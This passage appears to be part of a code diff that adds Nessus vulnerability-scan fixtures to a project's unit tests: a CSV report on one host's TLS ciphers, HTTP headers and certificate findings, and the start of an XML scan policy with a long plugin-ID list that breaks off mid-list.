+Paranoia level : 1 +Report verbosity : 1 +Safe checks : yes +Optimize the test : yes +Credentialed checks : no +Patch management checks : None +Display superseded patches : yes (supersedence plugin launched) +CGI scanning : disabled +Web application tests : disabled +Max hosts : 30 +Max checks : 4 +Recv timeout : 5 +Backports : None +Allow post-scan editing: Yes +Scan Start Date : 2021/1/25 18:40 Romance Standard Time +Scan duration : 519 sec +" +"21643","","","None","52.208.101.182","tcp","443","SSL Cipher Suites Supported","The remote service encrypts communications using SSL.","This plugin detects which SSL ciphers are supported by the remote +service for encrypting communications.","n/a","https://www.openssl.org/docs/man1.1.0/apps/ciphers.html +http://www.nessus.org/u?3a040ada"," +Here is the list of SSL ciphers supported by the remote server : +Each group is reported per SSL Version. + +SSL Version : TLSv12 + High Strength Ciphers (>= 112-bit key) + + Name Code KEX Auth Encryption MAC + ---------------------- ---------- --- ---- --------------------- --- + ECDHE-RSA-AES128-SHA256 0xC0, 0x2F ECDH RSA AES-GCM(128) SHA256 + ECDHE-RSA-AES256-SHA384 0xC0, 0x30 ECDH RSA AES-GCM(256) SHA384 + RSA-AES128-SHA256 0x00, 0x9C RSA RSA AES-GCM(128) SHA256 + RSA-AES256-SHA384 0x00, 0x9D RSA RSA AES-GCM(256) SHA384 + ECDHE-RSA-AES128-SHA 0xC0, 0x13 ECDH RSA AES-CBC(128) SHA1 + ECDHE-RSA-AES256-SHA 0xC0, 0x14 ECDH RSA AES-CBC(256) SHA1 + AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1 + AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1 + ECDHE-RSA-AES128-SHA256 0xC0, 0x27 ECDH RSA AES-CBC(128) SHA256 + ECDHE-RSA-AES256-SHA384 0xC0, 0x28 ECDH RSA AES-CBC(256) SHA384 + RSA-AES128-SHA256 0x00, 0x3C RSA RSA AES-CBC(128) SHA256 + RSA-AES256-SHA256 0x00, 0x3D RSA RSA AES-CBC(256) SHA256 + + +SSL Version : TLSv11 + High Strength Ciphers (>= 112-bit key) + + Name Code KEX Auth Encryption MAC + ---------------------- ---------- --- ---- --------------------- --- + ECDHE-RSA-AES128-SHA 0xC0, 0x13 ECDH RSA AES-CBC(128) SHA1 + ECDHE-RSA-AES256-SHA 0xC0, 0x14 ECDH RSA AES-CBC(256) SHA1 + AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1 + AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1 + + +SSL Version : TLSv1 + High Strength Ciphers (>= 112-bit key) + + Name Code KEX Auth Encryption MAC + ---------------------- ---------- --- ---- --------------------- --- + ECDHE-RSA-AES128-SHA 0xC0, 0x13 ECDH RSA AES-CBC(128) SHA1 + ECDHE-RSA-AES256-SHA 0xC0, 0x14 ECDH RSA AES-CBC(256) SHA1 + AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1 + AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1 + +The fields above are : + + {Tenable ciphername} + {Cipher ID code} + Kex={key exchange} + Auth={authentication} + Encrypt={symmetric encryption method} + MAC={message authentication code} + {export flag} +" +"22964","","","None","52.208.101.182","tcp","80","Service Detection","The remote service could be identified.","Nessus was able to identify the remote service by its banner or by +looking at the error message it sends when it receives an HTTP +request.","n/a","","A web server is running on this port." +"22964","","","None","52.208.101.182","tcp","443","Service Detection","The remote service could be identified.","Nessus was able to identify the remote service by its banner or by +looking at the error message it sends when it receives an HTTP +request.","n/a","","A TLSv1 server answered on this port. +" +"22964","","","None","52.208.101.182","tcp","443","Service Detection","The remote service could be identified.","Nessus was able to identify the remote service by its banner or by +looking at the error message it sends when it receives an HTTP +request.","n/a","","A web server is running on this port through TLSv1." +"24260","","","None","52.208.101.182","tcp","80","HyperText Transfer Protocol (HTTP) Information","Some information about the remote HTTP configuration can be extracted.","This test gives some information about the remote HTTP protocol - the +version used, whether HTTP Keep-Alive and HTTP pipelining are enabled, +etc... + +This test is informational only and does not denote any security +problem.","n/a",""," +Response Code : HTTP/1.1 404 Not Found + +Protocol version : HTTP/1.1 +SSL : no +Keep-Alive : no +Options allowed : (Not implemented) +Headers : + + Connection: close + Server: Cowboy + Date: Mon, 25 Jan 2021 17:46:16 GMT + Content-Length: 494 + Content-Type: text/html; charset=utf-8 + Cache-Control: no-cache, no-store + +Response Body : + +" +"24260","","","None","52.208.101.182","tcp","443","HyperText Transfer Protocol (HTTP) Information","Some information about the remote HTTP configuration can be extracted.","This test gives some information about the remote HTTP protocol - the +version used, whether HTTP Keep-Alive and HTTP pipelining are enabled, +etc... + +This test is informational only and does not denote any security +problem.","n/a",""," +Response Code : HTTP/1.1 404 Not Found + +Protocol version : HTTP/1.1 +SSL : yes +Keep-Alive : no +Options allowed : (Not implemented) +Headers : + + Connection: close + Server: Cowboy + Date: Mon, 25 Jan 2021 17:46:17 GMT + Content-Length: 494 + Content-Type: text/html; charset=utf-8 + Cache-Control: no-cache, no-store + +Response Body : + +" +"25220","","","None","52.208.101.182","tcp","0","TCP/IP Timestamps Supported","The remote service implements TCP timestamps.","The remote host implements TCP timestamps, as defined by RFC1323. A +side effect of this feature is that the uptime of the remote host can +sometimes be computed.","n/a","http://www.ietf.org/rfc/rfc1323.txt","" +"45410","","","None","52.208.101.182","tcp","443","SSL Certificate 'commonName' Mismatch","The 'commonName' (CN) attribute in the SSL certificate does not match +the hostname.","The service running on the remote host presents an SSL certificate for +which the 'commonName' (CN) attribute does not match the hostname on +which the service listens.","If the machine has several names, make sure that users connect to the +service through the DNS hostname that matches the common name in the +certificate.",""," +The host name known by Nessus is : + + ec2-52-208-101-182.eu-west-1.compute.amazonaws.com + +The Common Name in the certificate is : + + *.herokuapp.com + +The Subject Alternate Names in the certificate are : + + *.herokuapp.com + herokuapp.com +" +"45590","","","None","52.208.101.182","tcp","0","Common Platform Enumeration (CPE)","It was possible to enumerate CPE names that matched on the remote +system.","By using information obtained from a Nessus scan, this plugin reports +CPE (Common Platform Enumeration) matches for various hardware and +software products found on a host. + +Note that if an official CPE is not available for the product, this +plugin computes the best possible CPE based on the information +available from the scan.","n/a","http://cpe.mitre.org/ +https://nvd.nist.gov/products/cpe"," +The remote operating system matched the following CPE : + + cpe:/o:microsoft:windows_server_2012:r2 +" +"50845","","","None","52.208.101.182","tcp","443","OpenSSL Detection","The remote service appears to use OpenSSL to encrypt traffic.","Based on its response to a TLS request with a specially crafted +server name extension, it seems that the remote service is using the +OpenSSL library to encrypt traffic. + +Note that this plugin can only detect OpenSSL implementations that +have enabled support for TLS extensions (RFC 4366).","n/a","https://www.openssl.org/","" +"51891","","","None","52.208.101.182","tcp","443","SSL Session Resume Supported","The remote host allows resuming SSL sessions.","This script detects whether a host allows resuming SSL sessions by +performing a full SSL handshake to receive a session ID, and then +reconnecting with the previously used session ID. If the server +accepts the session ID in the second connection, the server maintains +a cache of sessions that can be resumed.","n/a",""," +This port supports resuming TLSv1 / TLSv1 / TLSv1 sessions. +" +"54615","","","None","52.208.101.182","tcp","0","Device Type","It is possible to guess the remote device type.","Based on the remote operating system, it is possible to determine +what the remote system type is (eg: a printer, router, general-purpose +computer, etc).","n/a","","Remote device type : unknown +Confidence level : 56 +" +"56984","","","None","52.208.101.182","tcp","443","SSL / TLS Versions Supported","The remote service encrypts communications.","This plugin detects which SSL and TLS versions are supported by the +remote service for encrypting communications.","n/a",""," +This port supports TLSv1.0/TLSv1.1/TLSv1.2. +" +"57041","","","None","52.208.101.182","tcp","443","SSL Perfect Forward Secrecy Cipher Suites Supported","The remote service supports the use of SSL Perfect Forward Secrecy +ciphers, which maintain confidentiality even if the key is stolen.","The remote host supports the use of SSL ciphers that offer Perfect +Forward Secrecy (PFS) encryption. These cipher suites ensure that +recorded SSL traffic cannot be broken at a future date if the server's +private key is compromised.","n/a","https://www.openssl.org/docs/manmaster/man1/ciphers.html +https://en.wikipedia.org/wiki/Diffie-Hellman_key_exchange +https://en.wikipedia.org/wiki/Perfect_forward_secrecy"," +Here is the list of SSL PFS ciphers supported by the remote server : + + High Strength Ciphers (>= 112-bit key) + + Name Code KEX Auth Encryption MAC + ---------------------- ---------- --- ---- --------------------- --- + ECDHE-RSA-AES128-SHA256 0xC0, 0x2F ECDH RSA AES-GCM(128) SHA256 + ECDHE-RSA-AES256-SHA384 0xC0, 0x30 ECDH RSA AES-GCM(256) SHA384 + ECDHE-RSA-AES128-SHA 0xC0, 0x13 ECDH RSA AES-CBC(128) SHA1 + ECDHE-RSA-AES256-SHA 0xC0, 0x14 ECDH RSA AES-CBC(256) SHA1 + ECDHE-RSA-AES128-SHA256 0xC0, 0x27 ECDH RSA AES-CBC(128) SHA256 + ECDHE-RSA-AES256-SHA384 0xC0, 0x28 ECDH RSA AES-CBC(256) SHA384 + +The fields above are : + + {Tenable ciphername} + {Cipher ID code} + Kex={key exchange} + Auth={authentication} + Encrypt={symmetric encryption method} + MAC={message authentication code} + {export flag} +" +"70544","","","None","52.208.101.182","tcp","443","SSL Cipher Block Chaining Cipher Suites Supported","The remote service supports the use of SSL Cipher Block Chaining +ciphers, which combine previous blocks with subsequent ones.","The remote host supports the use of SSL ciphers that operate in Cipher +Block Chaining (CBC) mode. These cipher suites offer additional +security over Electronic Codebook (ECB) mode, but have the potential to +leak information if used improperly.","n/a","https://www.openssl.org/docs/manmaster/man1/ciphers.html +http://www.nessus.org/u?cc4a822a +https://www.openssl.org/~bodo/tls-cbc.txt"," +Here is the list of SSL CBC ciphers supported by the remote server : + + High Strength Ciphers (>= 112-bit key) + + Name Code KEX Auth Encryption MAC + ---------------------- ---------- --- ---- --------------------- --- + ECDHE-RSA-AES128-SHA 0xC0, 0x13 ECDH RSA AES-CBC(128) SHA1 + ECDHE-RSA-AES256-SHA 0xC0, 0x14 ECDH RSA AES-CBC(256) SHA1 + AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1 + AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1 + ECDHE-RSA-AES128-SHA256 0xC0, 0x27 ECDH RSA AES-CBC(128) SHA256 + ECDHE-RSA-AES256-SHA384 0xC0, 0x28 ECDH RSA AES-CBC(256) SHA384 + RSA-AES128-SHA256 0x00, 0x3C RSA RSA AES-CBC(128) SHA256 + RSA-AES256-SHA256 0x00, 0x3D RSA RSA AES-CBC(256) SHA256 + +The fields above are : + + {Tenable ciphername} + {Cipher ID code} + Kex={key exchange} + Auth={authentication} + Encrypt={symmetric encryption method} + MAC={message authentication code} + {export flag} +" +"84502","","","None","52.208.101.182","tcp","443","HSTS Missing From HTTPS Server","The remote web server is not enforcing HSTS.","The remote HTTPS server is not enforcing HTTP Strict Transport Security (HSTS). +HSTS is an optional response header that can be configured on the server to instruct +the browser to only communicate via HTTPS. The lack of HSTS allows downgrade attacks, +SSL-stripping man-in-the-middle attacks, and weakens cookie-hijacking protections.","Configure the remote web server to use HSTS.","https://tools.ietf.org/html/rfc6797"," + The remote HTTPS server does not send the HTTP + ""Strict-Transport-Security"" header. +" +"94761","","","None","52.208.101.182","tcp","443","SSL Root Certification Authority Certificate Information","A root Certification Authority certificate was found at the top of the +certificate chain.","The remote service uses an SSL certificate chain that contains a +self-signed root Certification Authority certificate at the top of the +chain.","Ensure that use of this root Certification Authority certificate +complies with your organization's acceptable use and security +policies.","https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc778623(v=ws.10)"," +The following root Certification Authority certificate was found : + +|-Subject : C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance EV Root CA +|-Issuer : C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance EV Root CA +|-Valid From : Nov 10 00:00:00 2006 GMT +|-Valid To : Nov 10 00:00:00 2031 GMT +|-Signature Algorithm : SHA-1 With RSA Encryption +" +"95631","CVE-2004-2761","","None","52.208.101.182","tcp","443","SSL Certificate Signed Using Weak Hashing Algorithm (Known CA)","A known CA SSL certificate in the certificate chain has been signed +using a weak hashing algorithm.","The remote service uses a known CA certificate in the SSL certificate +chain that has been signed using a cryptographically weak hashing +algorithm (e.g., MD2, MD4, MD5, or SHA1). These signature algorithms +are known to be vulnerable to collision attacks. An attacker can +exploit this to generate another certificate with the same digital +signature, allowing the attacker to masquerade as the affected +service. + +Note that this plugin reports all SSL certificate chains signed with +SHA-1 that expire after January 1, 2017 as vulnerable. This is in +accordance with Google's gradual sunsetting of the SHA-1 cryptographic +hash algorithm.","Contact the Certificate Authority to have the certificate reissued.","https://tools.ietf.org/html/rfc3279 +https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2008/961509"," +The following known CA certificates were part of the certificate +chain sent by the remote host, but contain hashes that are considered +to be weak. + +|-Subject : C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance EV Root CA +|-Signature Algorithm : SHA-1 With RSA Encryption +|-Valid From : Nov 10 00:00:00 2006 GMT +|-Valid To : Nov 10 00:00:00 2031 GMT +" +"104743","","6.1","Medium","52.208.101.182","tcp","443","TLS Version 1.0 Protocol Detection","The remote service encrypts traffic using an older version of TLS.","The remote service accepts connections encrypted using TLS 1.0. TLS 1.0 has a +number of cryptographic design flaws. Modern implementations of TLS 1.0 +mitigate these problems, but newer versions of TLS like 1.2 and 1.3 are +designed against these flaws and should be used whenever possible. + +As of March 31, 2020, Endpoints that aren’t enabled for TLS 1.2 +and higher will no longer function properly with major web browsers and major vendors. + +PCI DSS v3.2 requires that TLS 1.0 be disabled entirely by June 30, +2018, except for POS POI terminals (and the SSL/TLS termination +points to which they connect) that can be verified as not being +susceptible to any known exploits.","Enable support for TLS 1.2 and 1.3, and disable support for TLS 1.0.","https://tools.ietf.org/html/draft-ietf-tls-oldversions-deprecate-00","TLSv1 is enabled and the server supports at least one cipher." +"121010","","","None","52.208.101.182","tcp","443","TLS Version 1.1 Protocol Detection","The remote service encrypts traffic using an older version of TLS.","The remote service accepts connections encrypted using TLS 1.1. +TLS 1.1 lacks support for current and recommended cipher suites. +Ciphers that support encryption before MAC computation, and +authenticated encryption modes such as GCM cannot be used with +TLS 1.1 + +As of March 31, 2020, Endpoints that are not enabled for TLS 1.2 +and higher will no longer function properly with major web browsers and major vendors.","Enable support for TLS 1.2 and/or 1.3, and disable support for TLS 1.1.","https://tools.ietf.org/html/draft-ietf-tls-oldversions-deprecate-00 +http://www.nessus.org/u?c8ae820d","TLSv1.1 is enabled and the server supports at least one cipher." +"136318","","","None","52.208.101.182","tcp","443","TLS Version 1.2 Protocol Detection","The remote service encrypts traffic using a version of TLS.","The remote service accepts connections encrypted using TLS 1.2.","N/A","https://tools.ietf.org/html/rfc5246","TLSv1.2 is enabled and the server supports at least one cipher." diff --git a/unittests/scans/nessus/nessus_v_unknown.xml b/unittests/scans/nessus/nessus_v_unknown.xml new file mode 100644 index 00000000000..229e86b2c93 --- /dev/null +++ b/unittests/scans/nessus/nessus_v_unknown.xml @@ -0,0 +1,13907 @@ + + +Internal Network Scan +max_simult_tcp_sessions +unlimited + +use_mac_addr +no + +plugin_set +16775;16066;25451;54191;60374;55364;61980;33572;12878;24384;43101;40715;26256;27362;57439;66560;21828;64849;39419;32080;65025;64615;28457;55991;38878;40003;40295;16700;14933;66924;19111;15882;36867;63797;24446;34096;34617;23116;27863;56309;23189;32964;50088;53469;34145;32085;27877;18919;60594;62734;42311;19973;31892;36886;38403;55257;25995;52440;31436;17166;65244;19388;27965;15393;26515;28262;16773;62047;20539;35893;59532;15649;23796;58710;11594;45524;33408;39771;29306;14951;63816;58325;31734;38307;32903;56742;22288;56843;34309;39792;19670;14569;56779;25131;51561;20609;40921;25266;29615;63994;58162;10204;53864;14546;22930;60854;25068;23322;16312;19085;44745;50674;44799;24139;12202;36772;18138;52867;55000;62536;16658;38123;34019;55904;40427;44045;38321;24327;62205;20432;23952;38236;21636;28106;36662;43573;55879;43474;51875;11729;13663;42859;56810;65485;47696;31561;47282;45832;53105;13247;56184;57113;11739;58678;27884;29860;51053;57103;46951;15171;14227;17165;20428;52632;41600;15266;16025;46105;51858;46237;39113;16893;22762;40250;51698;33691;42641;33700;54546;21258;58145;16638;63985;22868;49610;56746;52661;48874;51900;47041;24200;21571;66365;11943;20180;14171;10154;47806;62875;22482;45201;50431;30320;66411;28749;16299;22434;57250;51598;37120;45164;34660;29451;29617;49560;41594;59710;24867;48889;41944;43520;15774;54143;47460;49908;39636;49216;19225;49646;64778;42547;21541;57938;61559;18062;26524;38588;11272;21078;62583;60028;31067;37086;51363;15225;28696;20845;66903;16810;21701;66938;13008;15401;26081;51606;37106;37750;41013;20616;45996;53256;53194;24486;19214;10917;15378;54564;40520;27011;38990;19278;44149;55221;49975;43197;34147;32120;53066;33034;20189;61512;47009;55122;48195;51146;28485;24597;59787;24508;36760;20284;49322;40251;14441;25657;50355;30048;17716;59389;16967;36481;43373;60386;29491;38942;39491;37062;34111;54514;59702;12239;59574;20381;30751;24278;21000;41693;11941;54910;30073;28949;37389;40461;14315;10662;24806;14421;41100;26083;60317;22418;18129;32960;54316;45293;33282;63888;49382;25608;33820;12631;39693;59652;60850;46413;14781;60396;39705;17727;17426;64519;50675;10806;61239;20993;52205;42101;41218;16156;17053;25173;57840;51387;47451;11412;52770;10142;13207;37128;61996;27465;39296;49170;37769;29553;62985;38125;53435;53953;39482;29555;10005;15457;53021;33578;37474;20817;41795;20895;14788;19279;38643;47254;11370;18105;17676;14416;21002;39355;33000;30892;28206;50090;20345;22594;66573;53826;42459;19081;64084;63498;22829;39738;24054;37622;64018;31870;51369;10177;24577;14932;58389;45216;20406;65644;17277;25542;45615;31043;60619;15574;40887;22928;55048;10056;12252;36575;55774;52443;16894;40435;57020;25647;18618;25867;48891;18568;23509;32432;64128;40938;40964;36774;41656;54189;46755;34555;30819;14901;35624;31690;24442;39508;31017;66747;44910;24860;66726;26286;50212;34673;31837;53986;62223;12651;62597;11578;59925;28355;29359;17337;36753;42317;40747;22475;31811;49125;12217;57435;45150;50413;23691;29318;30543;64980;30717;54490;14590;56258;32092;35005;27058;63682;44878;34414;24479;19538;48351;20875;41702;20745;21460;53349;18604;63413;32031;31095;18493;33276;25231;13575;59411;13254;27641;24185;10728;42031;10509;15840;51593;39822;62915;43163;13600;52919;43765;62348;33759;62572;47784;35547;46362;12460;18058;59077;39266;65377;36671;53590;23588;36876;42538;28111;34519;15385;12791;49555;36275;10919;61384;37468;43972;37561;21368;38075;46049;65350;35176;45488;21860;45110;50531;58464;58041;53828;63141;37472;63036;60172;17071;41114;14931;59747;28638;54145;41520;44769;56847;31608;55045;20762;35022;41923;11245;14860;32854;19321;32687;42111;11443;39582;33385;38237;41105;65107;22860;64140;27061;42214;32717;53184;61441;23506;64376;33983;61050;19433;49821;24782;51774;21050;30977;50529;43066;35416;43307;65437;60770;49557;21178;62951;22336;53819;20653;45475;32808;30205;26929;39087;57575;25795;43669;50136;50635;29169;56044;64935;51248;63439;35292;65819;19276;33227;33468;55659;22413;50564;49335;56225;50940;11835;17312;44596;45350;50824;27851;27615;42051;60260;52980;13754;45371;49535;37287;50372;66798;65098;52118;46809;40916;61022;59507;10487;19584;42068;62333;39780;63440;47277;49386;16800;42439;19562;42422;40569;38296;58709;19101;33964;27934;50182;18477;31952;36996;61138;38756;44398;26914;44535;22302;22028;65355;33100;63222;43799;65393;33932;50485;28260;46277;18173;66809;47534;39752;60939;33256;13128;37404;42722;27748;23869;28637;35269;20006;19946;50710;36634;55495;19375;34331;34221;49683;23298;38821;57541;62192;55753;63185;61706;53618;59164;15021;22516;39253;60321;33009;44987;13572;11785;38740;22859;24335;57301;51549;13760;13629;58404;45841;34029;38889;11692;63168;44968;46739;18364;29423;31411;36936;42982;35083;52427;23972;27605;49771;57409;18506;21795;47364;55064;57124;21437;30557;63199;49058;63681;56704;13868;25172;49119;36118;62431;46763;27947;38440;60871;22736;50343;17518;28241;21685;64991;30877;65564;26075;64588;31292;27043;46326;51069;11882;28862;27312;55305;52119;39956;25539;32901;17283;37313;20482;16599;63869;18279;52999;58775;58925;31682;61762;47069;55992;51474;52120;19630;30133;29840;44698;63871;47549;11416;55092;30006;48518;19610;64232;17248;27507;65634;32913;36222;65030;53996;66837;47527;12066;43406;54840;48815;59208;66081;58477;23992;25082;36021;44848;60582;27244;38962;62147;46051;21145;51870;43396;17379;44959;15508;25749;41317;11939;28038;64030;22472;32775;32720;20661;60829;20478;65888;48975;20312;55736;47280;27368;21614;49621;14346;66705;16885;14990;40590;17341;16964;20537;63547;28024;52969;29552;22512;62391;29089;34985;11641;43809;19325;30063;28871;11083;51404;27623;38653;12591;47626;56106;13109;40597;28254;65197;62272;47195;13581;66079;57513;28656;51299;33961;30925;57380;49263;24402;52165;37217;14422;38193;56954;21935;17020;15816;61572;25924;44436;37002;17026;14778;18098;16208;65240;24886;49160;62318;62207;38251;11236;63680;41957;17821;54933;23081;16748;13836;27752;26339;26438;21042;33272;49930;11127;19945;35432;29117;54469;14629;44747;13295;16719;64494;51225;34427;17326;63290;38303;33640;38057;26792;33861;45029;11552;60343;24570;41673;51009;22602;23407;17351;23668;27482;65727;54713;30243;10529;29956;41096;40662;36505;20088;19047;10725;51001;55501;32772;53676;29442;10099;53759;52916;10757;52955;13406;45138;59824;18185;38919;31469;51505;55848;41273;19626;38636;37651;44516;25456;28809;40372;61213;18223;13036;34789;14155;33835;25476;59936;33819;55516;28108;21030;62988;65896;43038;18885;37022;44895;45625;38855;60721;26499;22110;26226;11327;10528;45246;22024;32658;24390;62492;21584;22653;45507;49412;46922;15609;48854;57207;56630;60357;30509;60709;17749;10496;64046;66410;53522;60772;29063;23459;28630;48276;28029;31726;64657;18670;24134;18176;53411;48570;61524;55917;66541;52382;25559;43142;34024;27028;22203;46331;63838;33087;51251;44651;39221;36605;26317;41449;43886;22937;43057;29396;20059;28849;17834;47061;50704;14127;45577;40259;59535;25971;11382;52653;44635;59506;38373;21538;50867;58272;15325;51334;29492;20960;48174;45747;48383;47102;11037;46449;53015;21226;13300;42375;11730;23877;35569;21007;24687;34066;27672;31231;56102;55400;38760;55789;60585;48811;13069;55306;44414;50853;55834;50950;17637;18421;53716;23325;65973;52191;48640;38050;16374;59123;41433;14379;46226;55859;17057;32179;62678;62279;58133;35156;35739;30910;25862;16620;17989;56086;39684;52356;23620;41384;10492;46561;36896;28527;34621;46839;31446;63114;17336;33978;63696;57393;40414;18442;22374;50265;30849;58937;21870;42833;26678;51226;34273;31366;40105;19559;59469;34363;38477;29915;10268;36362;21771;40188;19387;41442;52809;12235;40209;59134;62246;23204;61370;42494;54698;43086;29789;49710;15898;61995;54592;12444;23285;42106;64668;50098;23201;38968;44479;49130;40254;21858;44875;10392;43716;65781;44423;65190;44123;51124;35367;20316;60319;11021;65138;55640;49954;46005;29071;55322;16313;46205;51710;32981;19355;59850;60117;30972;29444;54926;59723;39015;25312;19490;54058;61158;64926;10673;63004;43687;33319;23625;42677;37753;61864;60737;36932;50884;19774;27393;23855;27432;36660;16221;22558;66921;37251;34773;57328;47119;40280;52219;42449;12287;58575;45074;12839;13814;38804;31773;12015;28424;39590;27145;58702;13537;58462;53240;14786;42138;51323;63894;15748;62968;32164;49071;17713;65573;63643;22528;56009;38506;61118;31617;24616;45768;24511;37845;66813;38412;27716;28151;56567;64799;29855;41945;44181;62309;23453;30547;62773;22174;18332;59957;43425;31792;60603;52133;22525;18991;63446;66647;63980;11702;58679;32697;57723;55095;54790;36982;18346;39996;66928;64660;44048;26735;59891;34239;40592;13311;56932;22289;53286;59428;26324;36805;13862;35895;34142;46860;46585;63381;42299;23786;54723;31471;20113;23449;38220;36695;42984;25656;18483;37281;20569;61528;11066;52960;58568;10911;11337;10573;60670;55587;53683;44505;25025;34872;12928;30072;25146;28962;51352;57659;46386;41339;14713;16827;37978;39575;53026;16098;49580;55024;34344;55885;65226;55726;34917;24761;61258;52891;17671;64723;59049;63861;32295;59792;26343;27278;52907;64774;25985;54495;54260;33335;65555;17085;46321;38478;42297;37500;53927;47407;12111;24559;52829;59736;49945;66574;16501;30991;33442;49566;61376;13227;66556;43701;24676;17599;57144;15970;56168;21280;59910;53622;14897;18823;49759;38446;36319;14596;32784;28896;14511;48237;36920;15699;13090;18348;60614;44614;19356;13726;45516;13696;15222;52441;56984;25406;12232;60570;35900;21392;45595;41987;20130;34192;39787;14332;55626;49110;23624;40830;52492;26345;13464;21054;26501;26084;19654;16923;46109;36761;26687;62762;25609;29109;61372;16315;37636;28225;57487;18226;13997;34669;31706;19074;52790;28025;63969;58209;56568;57021;50794;42558;15444;29187;54812;63495;28671;64096;27908;64653;15734;58698;16220;14551;34233;21328;49729;60200;31181;38535;14720;50006;35002;53884;43232;55399;22023;35199;64781;62519;61318;30126;55527;53386;28286;13268;35138;59822;42263;44522;37730;14974;27973;21248;49779;37366;27549;19597;36288;42785;27398;43394;43736;47638;28384;42113;59006;26012;51538;39119;33168;58616;24455;53124;36196;60064;17077;14658;37656;53236;27987;50690;60171;65825;16484;14670;46519;44454;17791;17445;55285;61127;57143;21214;12906;15780;56723;24491;40311;26974;43881;33450;14787;12804;27256;32593;61977;65544;14399;18993;34347;22391;51955;23395;50707;58540;31423;23621;50049;16291;56535;45604;59203;50919;43906;36594;26070;11290;61037;41515;61733;48647;44313;36612;64941;61989;30725;13049;35537;25235;24636;40977;32859;47846;13753;15878;15196;37503;60855;30018;17171;47270;59027;11026;46430;41841;26444;47378;60484;56493;64342;15109;34367;14733;56754;26938;11985;44750;52739;61747;40129;47386;51321;30897;14013;53474;26021;38161;10970;56239;27533;38798;54387;14303;33571;12921;33587;12503;23784;16443;44427;57549;43145;61310;23097;57175;55208;26448;30417;44018;59534;43872;51202;60618;26465;24685;33584;11714;46667;50643;20831;47111;51975;14337;32591;46358;36527;10947;22782;33384;15095;52180;34851;66126;54203;34149;25160;60383;58842;26138;60044;52944;39820;51925;12736;44553;20387;13427;24057;41470;32966;37377;52954;56649;15676;66950;59041;41281;59047;60336;38995;48287;61423;45817;29854;15621;14985;28989;52808;21052;62399;24602;14092;36347;50631;36673;38194;49833;35888;19154;61013;62289;46576;21831;29435;46659;40391;12536;58040;61701;28408;66255;39601;13071;32185;38309;46384;49390;24114;61869;48773;53955;62316;66119;40239;35572;24917;63349;19846;33715;15268;64544;47028;30968;65664;32235;44071;45162;41880;14342;16655;44037;29285;47066;44625;47298;59338;24992;47668;17717;38580;10666;65401;25418;55403;43522;14795;26449;48689;18690;28081;25948;45363;55733;46152;20900;32692;15688;17174;36035;65351;20304;28471;25250;42082;35306;46666;40332;34572;11474;50411;26953;33678;49982;28838;26643;35550;50544;45795;10913;26017;33375;63543;43723;31780;27349;51717;28587;41759;62805;35686;64298;42267;21937;41498;18983;57878;65289;47136;31538;33699;64712;43051;21574;13692;11757;29834;44573;14184;53778;42541;13282;42094;42652;43751;23652;15899;31527;36504;51485;53727;43102;38382;30312;18852;48742;15389;36601;40235;49304;27686;51186;18895;16349;35602;41185;12673;46909;13253;22485;45906;53707;32985;35026;36345;13333;48940;28655;40737;16297;23528;37362;18657;65567;65261;20149;45517;40252;12584;64764;48916;56005;42857;62619;26373;39620;34310;58880;22012;24938;65200;53515;66361;65911;57685;64828;62506;58072;37485;55077;61874;16248;17710;29632;59923;65196;60467;14604;60385;64056;22456;43471;39027;35800;55175;24255;47063;38593;54551;61148;28978;24222;66299;15541;12399;32910;47441;44998;33170;13750;47728;32197;52578;35652;35581;28026;51235;51074;25877;60842;43829;46559;62792;43753;22963;64596;18443;19764;18229;37416;38758;30142;62146;57504;50907;14187;51528;35552;47258;36623;45305;34421;32339;65071;66226;10859;23963;46878;56002;33501;47861;49532;29971;55664;29065;15597;23198;20580;32399;21379;23555;36135;40302;41631;15102;38763;28118;35324;61764;56219;22721;41090;13719;25908;54041;29043;13446;60863;26162;59201;43794;56415;26656;24904;15677;66851;63493;30573;47095;39250;53315;32038;50823;14809;27122;26022;54335;39189;39182;38534;33879;59245;44729;31155;34771;38547;66391;26150;63828;15620;50259;35679;20871;61556;64184;26201;62836;60371;59372;57552;19689;52166;58521;18160;34460;33064;38574;66611;62764;51542;44183;29110;47794;28539;13704;20626;28334;64301;38748;47689;10670;19453;21011;56133;41328;37760;28074;50759;63927;58874;14174;65939;46558;37092;13033;37535;22998;51075;38916;27270;43260;45281;15674;16509;54940;26798;57075;12439;60098;12471;19875;47715;32978;44452;44114;27474;33542;55178;57656;20805;65447;45638;35633;17272;55902;29008;45463;50123;58665;53502;27492;42411;25750;30095;55402;41828;51930;35722;17376;11649;28430;58608;51289;59728;36010;38449;23941;33885;39100;56937;22784;34164;47359;18512;17504;49270;16200;56419;66827;33742;15506;22807;17625;10273;27501;15794;31661;33803;45789;43267;44272;60209;47297;51388;11063;14052;48721;32690;23320;37397;19409;52991;11658;50314;46220;45180;27829;43333;66242;49220;52712;34710;42260;66349;14076;45169;48505;38575;18978;54503;62368;26440;54064;34064;61888;24275;48950;33077;55380;59785;16765;29001;28548;52733;46917;35454;53231;41094;25137;17689;20819;10296;15138;33539;38829;64851;18389;58030;45426;29532;62035;48683;55811;64389;55415;54421;43578;61577;51375;12120;51458;52283;51778;20300;42117;44956;31102;52573;23244;22267;41812;26862;66635;61253;13633;21001;21842;13617;30762;38551;51221;33506;59071;50227;49225;36397;27966;30636;38632;60264;27077;60097;11054;56361;21905;15921;19937;49228;30974;23059;49326;38199;26208;18518;38903;13953;66940;15418;11131;45551;31192;25627;43914;38337;35253;11469;46438;26709;18951;42977;56873;11758;33832;44434;54036;29913;28145;24348;57110;39023;36140;18497;46317;22078;56578;20843;13847;60873;36552;39891;64755;20689;11828;29596;56051;60170;38838;21274;31104;54513;54720;48814;16464;12458;27097;50518;21022;42615;60864;46235;35428;57961;24425;34956;56097;52680;24313;62470;63066;1